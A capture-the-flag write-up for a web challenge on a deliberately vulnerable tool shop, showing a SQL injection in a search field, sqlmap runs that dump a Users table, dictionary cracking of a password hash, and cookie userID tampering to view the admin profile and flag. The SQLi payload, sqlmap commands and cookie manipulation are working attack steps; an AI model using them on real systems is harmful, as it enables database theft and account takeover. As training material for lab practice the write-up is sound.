Tony decided to launch bug bounties on his website for the first time, so it’s likely to have some very common vulnerabilities.

http://chall.0xfun.org:726

---

Found nothing special in html contents of home/login page.

Trying SQLi in search field worked - 

```
GET /search?item=admin%27%20OR%201=1%20-- HTTP/1.1
Host: chall.0xfun.org:726
Accept-Language: en-GB,en;q=0.9
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Connection: keep-alive


HTTP/1.1 200 OK
Server: Werkzeug/3.1.3 Python/3.10.19
Date: Fri, 13 Feb 2026 07:58:41 GMT
Content-Type: text/html; charset=utf-8
Content-Length: 4464
Connection: close

<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Tony's Tools</title>
    <style>
body {
	font-family: 'Segoe UI', Tahoma, Geneva, Verdana, sans-serif;
	margin: 0;
	padding: 0;
	background-color: #f7f7f7;
	color: #333;
}

nav {
	background-color: #333;
	padding: 15px 20px;
	text-align: center;
}

nav a {
	color: #fff;
	text-decoration: none;
	margin: 0 10px;
	font-weight: bold;
}

nav a:hover {
	text-decoration: underline;
}

h1 {
	text-align: center;
	margin-top: 30px;
	color: #222;
}

h2 {
	text-align: center;
	margin-top: 30px;
	color: #222;
}

form {
	max-width: 400px;
	margin: 20px auto;
	padding: 20px;
	background-color: #fff;
	border-radius: 8px;
	box-shadow: 0 2px 8px rgba(0, 0, 0, 0.1);
}

input[type="text"], input[type="password"] {
	width: 100%;
	padding: 10px;
	margin: 10px 0;
	border: 1px solid #ccc;
	border-radius: 5px;
	box-sizing: border-box;
}

input[type="submit"] {
	background-color: #333;
	color: white;
	border: none;
	padding: 10px 15px;
	border-radius: 5px;
	cursor: pointer;
	width: 100%;
}

input[type="submit"]:hover {
	background-color: #555;
}

p {
	max-width: 700px;
	margin: 10px auto;
	padding: 10px;
	text-align: center;
}

.profile {
	text-align: left;
	margin: 10px;
}

.results {
	max-width: 700px;
	margin: 20px auto;
	background: white;
	padding: 15px;
	border-radius: 8px;
	box-shadow: 0 2px 8px rgba(0, 0, 0, 0.05);
}

.error {
	color: red;
	max-width: 700px;
	margin: 20px auto;
	background: white;
	padding: 15px;
	border-radius: 8px;
	box-shadow: 0 2px 8px rgba(0, 0, 0, 0.05);
}
</style>
</head>
<body>
    <nav>
    <a href="/">Home</a> |
    
        <a href="/login">Login</a>
    
</nav>
    <h1>Tony's Tools</h1>
    <p>What would you like to buy?</p>
    <form action="/search" method="GET">
        Item: <input type="text" id="item" name="item">
        <input type="submit" value="Submit">
    </form>
    
        
            <h2>Results:</h2>
            
                <p class="results">Name: Wrench - Price: $4.98</p>
            
                <p class="results">Name: Hammer - Price: $4.98</p>
            
                <p class="results">Name: Grabo Suction Lifter - Price: $499.0</p>
            
                <p class="results">Name: Tripod - Price: $139.0</p>
            
                <p class="results">Name: Mallet - Price: $7.98</p>
            
                <p class="results">Name: Pliers - Price: $4.98</p>
            
                <p class="results">Name: Tape Measure - Price: $4.5</p>
            
                <p class="results">Name: Snap Off Knife - Price: $1.98</p>
            
                <p class="results">Name: Stud Finder - Price: $49.98</p>
            
                <p class="results">Name: Bubble Level - Price: $2.98</p>
            
                <p class="results">Name: Stapple Gun - Price: $24.98</p>
            
                <p class="results">Name: Hand Saw - Price: $6.98</p>
            
                <p class="results">Name: Plasters Trowel - Price: $6.98</p>
            
                <p class="results">Name: Steel Ruler - Price: $4.98</p>
            
                <p class="results">Name: Trimming Knife - Price: $9.31</p>
            
                <p class="results">Name: Laser Level - Price: $39.98</p>
            
                <p class="results">Name: Scissors - Price: $9.98</p>
            
                <p class="results">Name: Torque Screwdriver - Price: $299.95</p>
            
                <p class="results">Name: Sledge Hammer - Price: $85.98</p>
            
                <p class="results">Name: Chisel Set - Price: $259.1</p>
            
                <p class="results">Name: Hacksaw - Price: $58.95</p>
            
                <p class="results">Name: Metal Locator - Price: $379.0</p>
            
                <p class="results">Name: Rachet Screwdriver - Price: $89.0</p>
            
                <p class="results">Name: Fencing Pliers - Price: $55.95</p>
            
                <p class="results">Name: Stripping Pliers - Price: $299.0</p>
            
                <p class="results">Name: Crimp Tool - Price: $329.0</p>
            
                <p class="results">Name: Pocket Knife - Price: $249.0</p>
            
                <p class="results">Name: Wood Stapler - Price: $779.0</p>
            
        
    
</body>
</html>
```


Trying sqlmap to enumerate - 

```
└─$ sqlmap -u "http://chall.0xfun.org:726/search?item=tool" --dbs           
        ___
       __H__                                                                                                                                                                                                      
 ___ ___[)]_____ ___ ___  {1.9.2#stable}                                                                                                                                                                          
|_ -| . [(]     | .'| . |                                                                                                                                                                                         
|___|_  [(]_|_|_|__,|  _|                                                                                                                                                                                         
      |_|V...       |_|   https://sqlmap.org                                                                                                                                                                      

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 13:26:45 /2026-02-13/

[13:26:46] [INFO] testing connection to the target URL
[13:26:47] [INFO] checking if the target is protected by some kind of WAF/IPS
[13:26:47] [INFO] testing if the target URL content is stable
[13:26:48] [INFO] target URL content is stable
[13:26:48] [INFO] testing if GET parameter 'item' is dynamic
[13:26:48] [INFO] GET parameter 'item' appears to be dynamic
[13:26:48] [WARNING] heuristic (basic) test shows that GET parameter 'item' might not be injectable
[13:26:48] [INFO] testing for SQL injection on GET parameter 'item'
[13:26:48] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[13:26:51] [INFO] testing 'Boolean-based blind - Parameter replace (original value)'
[13:26:52] [INFO] testing 'MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE)'
[13:26:53] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause'
[13:26:54] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause (IN)'
[13:26:55] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLType)'
[13:26:57] [INFO] testing 'Generic inline queries'
[13:26:57] [INFO] testing 'PostgreSQL > 8.1 stacked queries (comment)'
[13:26:58] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries (comment)'
[13:26:58] [INFO] testing 'Oracle stacked queries (DBMS_PIPE.RECEIVE_MESSAGE - comment)'
[13:26:59] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)'
[13:27:00] [INFO] testing 'PostgreSQL > 8.1 AND time-based blind'
[13:27:02] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind (IF)'
[13:27:03] [INFO] testing 'Oracle AND time-based blind'
it is recommended to perform only basic UNION tests if there is not at least one other (potential) technique found. Do you want to reduce the number of requests? [Y/n] Y
[13:27:36] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns'
[13:27:37] [INFO] 'ORDER BY' technique appears to be usable. This should reduce the time needed to find the right number of query columns. Automatically extending the range for current UNION query injection technique test
[13:27:39] [INFO] target URL appears to have 2 columns in query
[13:27:39] [WARNING] applying generic concatenation (CONCAT)
[13:27:39] [INFO] GET parameter 'item' is 'Generic UNION query (NULL) - 1 to 10 columns' injectable
[13:27:39] [INFO] checking if the injection point on GET parameter 'item' is a false positive
GET parameter 'item' is vulnerable. Do you want to keep testing the others (if any)? [y/N] N
sqlmap identified the following injection point(s) with a total of 83 HTTP(s) requests:
---
Parameter: item (GET)
    Type: UNION query
    Title: Generic UNION query (NULL) - 2 columns
    Payload: item=tool' UNION ALL SELECT NULL,CONCAT(CONCAT('qkvqq','GGNpfnUAQUYbugJlEMGbIKXoUpzbFBISMABStQJY'),'qqzpq')-- hlWl
---
[13:27:46] [INFO] testing MySQL
[13:27:46] [WARNING] the back-end DBMS is not MySQL
[13:27:46] [INFO] testing Oracle
[13:27:46] [WARNING] the back-end DBMS is not Oracle
[13:27:46] [INFO] testing PostgreSQL
[13:27:47] [WARNING] the back-end DBMS is not PostgreSQL
[13:27:47] [INFO] testing Microsoft SQL Server
[13:27:47] [WARNING] the back-end DBMS is not Microsoft SQL Server
[13:27:47] [INFO] testing SQLite
[13:27:47] [INFO] confirming SQLite
[13:27:47] [INFO] actively fingerprinting SQLite
[13:27:48] [INFO] the back-end DBMS is SQLite
back-end DBMS: SQLite
[13:27:48] [WARNING] on SQLite it is not possible to enumerate databases (use only '--tables')
[13:27:48] [INFO] fetched data logged to text files under '/home/kali/.local/share/sqlmap/output/chall.0xfun.org'
[13:27:48] [WARNING] your sqlmap version is outdated

```

```
└─$ sqlmap -u "http://chall.0xfun.org:726/search?item=tool" --tables
        ___
       __H__                                                                                                                                                                                                      
 ___ ___[(]_____ ___ ___  {1.9.2#stable}                                                                                                                                                                          
|_ -| . [(]     | .'| . |                                                                                                                                                                                         
|___|_  [)]_|_|_|__,|  _|                                                                                                                                                                                         
      |_|V...       |_|   https://sqlmap.org                                                                                                                                                                      

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 13:28:00 /2026-02-13/

[13:28:00] [INFO] resuming back-end DBMS 'sqlite' 
[13:28:00] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: item (GET)
    Type: UNION query
    Title: Generic UNION query (NULL) - 2 columns
    Payload: item=tool' UNION ALL SELECT NULL,CONCAT(CONCAT('qkvqq','GGNpfnUAQUYbugJlEMGbIKXoUpzbFBISMABStQJY'),'qqzpq')-- hlWl
---
[13:28:02] [INFO] the back-end DBMS is SQLite
back-end DBMS: SQLite
[13:28:02] [INFO] fetching tables for database: 'SQLite_masterdb'
<current>
[3 tables]
+-----------------+
| Products        |
| Users           |
| sqlite_sequence |
+-----------------+

[13:28:02] [INFO] fetched data logged to text files under '/home/kali/.local/share/sqlmap/output/chall.0xfun.org'
[13:28:02] [WARNING] your sqlmap version is outdated

[*] ending @ 13:28:02 /2026-02-13/
```

```
┌──(kali㉿kali)-[~/CTF/0xFunCTF26/Web/Jinja]
└─$ sqlmap -u "http://chall.0xfun.org:726/search?item=tool" -T Users --dump
        ___
       __H__                                                                                                                                                                                                      
 ___ ___["]_____ ___ ___  {1.9.2#stable}                                                                                                                                                                          
|_ -| . [(]     | .'| . |                                                                                                                                                                                         
|___|_  [)]_|_|_|__,|  _|                                                                                                                                                                                         
      |_|V...       |_|   https://sqlmap.org                                                                                                                                                                      

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 13:29:42 /2026-02-13/

[13:29:43] [INFO] resuming back-end DBMS 'sqlite' 
[13:29:43] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: item (GET)
    Type: UNION query
    Title: Generic UNION query (NULL) - 2 columns
    Payload: item=tool' UNION ALL SELECT NULL,CONCAT(CONCAT('qkvqq','GGNpfnUAQUYbugJlEMGbIKXoUpzbFBISMABStQJY'),'qqzpq')-- hlWl
---
[13:29:43] [INFO] the back-end DBMS is SQLite
back-end DBMS: SQLite
[13:29:43] [INFO] fetching columns for table 'Users' 
[13:29:44] [INFO] fetching entries for table 'Users'
[13:29:44] [INFO] recognized possible password hashes in column 'Password'
do you want to store hashes to a temporary file for eventual further processing with other tools [y/N] y
[13:29:49] [INFO] writing hashes to a temporary file '/tmp/sqlmapo2sfywvj152450/sqlmaphashes-587rycw_.txt' 
y
[13:29:55] [INFO] using hash method 'sha256_generic_passwd'
what dictionary do you want to use?
[1] default dictionary file '/usr/share/sqlmap/data/txt/wordlist.tx_' (press Enter)
[2] custom dictionary file
[3] file with list of dictionary files
> 2
what's the custom dictionary's location?
> /usr/share/wordlists/rockyou.txt
[13:30:15] [INFO] using custom dictionary
[13:30:15] [CRITICAL] there was a problem while loading dictionaries ('unable to read file '/ususr/share/wordlists/rockyou.txt'')
what dictionary do you want to use?
[1] default dictionary file '/usr/share/sqlmap/data/txt/wordlist.tx_' (press Enter)
[2] custom dictionary file
[3] file with list of dictionary files
> 2
what's the custom dictionary's location?
> /usr/share/wordlists/rockyou.txt
[13:30:25] [INFO] using custom dictionary
do you want to use common password suffixes? (slow!) [y/N] N
[13:30:29] [INFO] starting dictionary-based cracking (sha256_generic_passwd)
[13:30:29] [INFO] starting 8 processes 
[13:30:29] [INFO] cracked password '1qaz2wsx' for user 'Jerry'                                                                                                                                                   
[13:31:55] [INFO] current status: 21029... |^Crry
[13:31:55] [WARNING] user aborted during dictionary-based attack phase (Ctrl+C was pressed)
Database: <current>                                                                                                                                                                                              
Table: Users
[2 entries]
+--------+-----------------------------------------------------------------------------+----------+
| UserID | Password                                                                    | Username |
+--------+-----------------------------------------------------------------------------+----------+
| 1      | 0000000000000000000000000000000000000000000000000000000000000000            | Admin    |
| 2      | 059a00192592d5444bc0caad7203f98b506332e2cf7abb35d684ea9bf7c18f08 (1qaz2wsx) | Jerry    |
+--------+-----------------------------------------------------------------------------+----------+

[13:31:55] [INFO] table 'SQLite_masterdb.Users' dumped to CSV file '/home/kali/.local/share/sqlmap/output/chall.0xfun.org/dump/SQLite_masterdb/Users.csv'
[13:31:55] [INFO] fetched data logged to text files under '/home/kali/.local/share/sqlmap/output/chall.0xfun.org'
[13:31:55] [WARNING] your sqlmap version is outdated
```


Logging in as Jerry- 

```
GET /user HTTP/1.1
Host: chall.0xfun.org:726
Accept-Language: en-GB,en;q=0.9
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Referer: http://chall.0xfun.org:726/search?item=admin%27+OR+1%3D1+--
Accept-Encoding: gzip, deflate, br
Cookie: userID=2; user=0cea94be4ad3fc313cee0f65c3fd5dbc5dcf93d7e1bb337f2ecac06e52f29c28
Connection: keep-alive

HTTP/1.1 200 OK
Server: Werkzeug/3.1.3 Python/3.10.19
Date: Fri, 13 Feb 2026 08:03:20 GMT
Content-Type: text/html; charset=utf-8
Content-Length: 2031
Connection: close

<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Tony's - My Profile</title>
    <style>
body {
	font-family: 'Segoe UI', Tahoma, Geneva, Verdana, sans-serif;
	margin: 0;
	padding: 0;
	background-color: #f7f7f7;
	color: #333;
}

nav {
	background-color: #333;
	padding: 15px 20px;
	text-align: center;
}

nav a {
	color: #fff;
	text-decoration: none;
	margin: 0 10px;
	font-weight: bold;
}

nav a:hover {
	text-decoration: underline;
}

h1 {
	text-align: center;
	margin-top: 30px;
	color: #222;
}

h2 {
	text-align: center;
	margin-top: 30px;
	color: #222;
}

form {
	max-width: 400px;
	margin: 20px auto;
	padding: 20px;
	background-color: #fff;
	border-radius: 8px;
	box-shadow: 0 2px 8px rgba(0, 0, 0, 0.1);
}

input[type="text"], input[type="password"] {
	width: 100%;
	padding: 10px;
	margin: 10px 0;
	border: 1px solid #ccc;
	border-radius: 5px;
	box-sizing: border-box;
}

input[type="submit"] {
	background-color: #333;
	color: white;
	border: none;
	padding: 10px 15px;
	border-radius: 5px;
	cursor: pointer;
	width: 100%;
}

input[type="submit"]:hover {
	background-color: #555;
}

p {
	max-width: 700px;
	margin: 10px auto;
	padding: 10px;
	text-align: center;
}

.profile {
	text-align: left;
	margin: 10px;
}

.results {
	max-width: 700px;
	margin: 20px auto;
	background: white;
	padding: 15px;
	border-radius: 8px;
	box-shadow: 0 2px 8px rgba(0, 0, 0, 0.05);
}

.error {
	color: red;
	max-width: 700px;
	margin: 20px auto;
	background: white;
	padding: 15px;
	border-radius: 8px;
	box-shadow: 0 2px 8px rgba(0, 0, 0, 0.05);
}
</style>
</head>
<body>
    <nav>
    <a href="/">Home</a> |
    
        <a href="/logout">Logout</a>
        <a href="/user">My Profile</a>
    
</nav>
    <h1>My Profile</h1>
    
    	<p class="profile">What to buy:</p>
    
    	<p class="profile">	- Sledge Hammer</p>
    
    	<p class="profile">	- Soldering Iron</p>
    
    	<p class="profile">	- Rag</p>
    
</body>
</html>
```


The Cookie field has an `userID` field set to 2. Let's try to tamper and see if we have IDOR/BOLA - 

```
GET /user HTTP/1.1
Host: chall.0xfun.org:726
Accept-Language: en-GB,en;q=0.9
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Referer: http://chall.0xfun.org:726/search?item=admin%27+OR+1%3D1+--
Accept-Encoding: gzip, deflate, br
Cookie: userID=1; user=0cea94be4ad3fc313cee0f65c3fd5dbc5dcf93d7e1bb337f2ecac06e52f29c28
Connection: keep-alive

HTTP/1.1 200 OK
Server: Werkzeug/3.1.3 Python/3.10.19
Date: Fri, 13 Feb 2026 08:04:05 GMT
Content-Type: text/html; charset=utf-8
Content-Length: 1976
Connection: close

<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Tony's - My Profile</title>
    <style>
body {
	font-family: 'Segoe UI', Tahoma, Geneva, Verdana, sans-serif;
	margin: 0;
	padding: 0;
	background-color: #f7f7f7;
	color: #333;
}

nav {
	background-color: #333;
	padding: 15px 20px;
	text-align: center;
}

nav a {
	color: #fff;
	text-decoration: none;
	margin: 0 10px;
	font-weight: bold;
}

nav a:hover {
	text-decoration: underline;
}

h1 {
	text-align: center;
	margin-top: 30px;
	color: #222;
}

h2 {
	text-align: center;
	margin-top: 30px;
	color: #222;
}

form {
	max-width: 400px;
	margin: 20px auto;
	padding: 20px;
	background-color: #fff;
	border-radius: 8px;
	box-shadow: 0 2px 8px rgba(0, 0, 0, 0.1);
}

input[type="text"], input[type="password"] {
	width: 100%;
	padding: 10px;
	margin: 10px 0;
	border: 1px solid #ccc;
	border-radius: 5px;
	box-sizing: border-box;
}

input[type="submit"] {
	background-color: #333;
	color: white;
	border: none;
	padding: 10px 15px;
	border-radius: 5px;
	cursor: pointer;
	width: 100%;
}

input[type="submit"]:hover {
	background-color: #555;
}

p {
	max-width: 700px;
	margin: 10px auto;
	padding: 10px;
	text-align: center;
}

.profile {
	text-align: left;
	margin: 10px;
}

.results {
	max-width: 700px;
	margin: 20px auto;
	background: white;
	padding: 15px;
	border-radius: 8px;
	box-shadow: 0 2px 8px rgba(0, 0, 0, 0.05);
}

.error {
	color: red;
	max-width: 700px;
	margin: 20px auto;
	background: white;
	padding: 15px;
	border-radius: 8px;
	box-shadow: 0 2px 8px rgba(0, 0, 0, 0.05);
}
</style>
</head>
<body>
    <nav>
    <a href="/">Home</a> |
    
        <a href="/logout">Logout</a>
        <a href="/user">My Profile</a>
    
</nav>
    <h1>My Profile</h1>
    
    	<p class="profile">0xfun{T0ny&#39;5_T00ly4rd._1_H0p3_Y0u_H4d_Fun_SQL1ng,_H45H_Cr4ck1ng,_4nd_W1th_C00k13_M4n1pu74t10n}</p>
    
</body>
</html>
```

HTML Decode to get flag - 

```
0xfun{T0ny'5_T00ly4rd._1_H0p3_Y0u_H4d_Fun_SQL1ng,_H45H_Cr4ck1ng,_4nd_W1th_C00k13_M4n1pu74t10n}
```